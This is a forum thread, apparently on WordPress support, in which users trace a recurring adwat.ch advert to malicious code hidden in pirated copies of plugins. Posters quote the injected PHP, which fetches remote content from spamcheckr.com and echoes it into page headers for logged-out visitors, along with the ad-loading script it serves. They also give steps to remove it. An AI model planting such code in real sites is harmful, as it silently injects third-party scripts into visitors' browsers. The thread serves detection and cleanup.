https://adwat.ch advert keeps appearing

It sounds like a plugin (or theme), especially if you only see it when you are logged in? If you see it when you are logged out, your site may have been hacked.

The best thing to do is disable your plugins (start with the newest/most likely) to see if it disappears.

Many thanks WPMadeEasy, very helpful!

I’ve just found a forum thread which is worth reading.

https://bestblackhatforum.com/Thread-Beware-before-downloading-wordpress-themes-and-plugins-adwatch

That thread was useful. Especially this part:

“Login to you wp-admin and then go to your site
click view source
now ctrl+f and search body {visibility:hidden;}
this code confirms adwatch is inserted in your theme or plugins.”

Got an idea of what plugins causing it now. Going to check it’s js for any suspicious adwatch code.

I am facing this same problem since past few days… Please Help

Just as an aside, for others who may have pulled out every strand of hair trying to resolve this.

My file was hidden away in “classes/class-settings.php” and called by include ‘classes/class-settings.php’; in my eventon.php file.

The key is to do a search (I used the Multi-File Search in TextWrangler of my entire site — downloaded locally to my machine) for the following string: spamcheckr

The “infected” file (class-settings.php) has a ton of commented out lines of code, but it really only does one thing which is to pull the URL “https://spamcheckr.com/l.php”. Just bringing that URL up in your browser will show a blank page. But if you view the source, you will see the following code:

<script type="text/javascript">
var adwatch_id = 234224;
var adwatch_advert = "int";
var exclude_domains = ['wp-admin', 'wp-login', 'hillaryClinton2016.com', 'mpmgworld.com', 'madeforher.in', 'robfordformayor.ca', 'pachecovirtual.com.ar', 'corporativo2.tk', 'r3d.pt'];
</script>
<script type="text/javascript" src="https://adwat.ch/js/easylink.js"></script>

Just delete the include from your file and delete that class-settings.php and you should be good to go.

Hope this helps.

Previous post is useful (search text ‘spamcheckr.com’ in your site’s files)….

All textlines were:

<?php if (!isset($_COOKIE[‘wordpress_test_cookie’])){ if (mt_rand(1,20) == 1) {function secqc2_cahesk() {if(function_exists(‘curl_init’)){$addressd = “https://spamcheckr.com/l.php&#8221;;$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo “$data”;}}add_action(‘wp_head’,’secqc2_cahesk’);}} ?>

My problem was in gravityforms 1.8.4 (not official). Crapfile is ‘gravityforms/includes/settings.php’ and it called from line 56 of ‘gravityforms/gravityforms.php’
1. Erise line “include ‘includes/settings.php’;” from gravityforms.php
2. Delete file ‘gravityforms/includes/settings.php’

PS… don’t touch file ‘gravityforms/settings.php’ its native ??

Thank you guys – I found it in socialbuffs plugin (not original)

It was hidden in /libs/class.php

`<?php if (!isset($_COOKIE[‘wordpress_test_cookie’])){ if (mt_rand(1,20) == 1) {function secqc6_chesk() {if(function_exists(‘curl_init’)){$addressd = “https://spamcheckr.com/l.php&#8221;;$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo “$data”;}}add_action(‘wp_head’,’secqc6_chesk’);}} ?>

I deleted whole class.php, not just that string, and it seems that problem is resolved.

Justo don’t forget to check all files for suspicious base64_decode string. Where ever is $img data around base64_docode its probably a malicious string.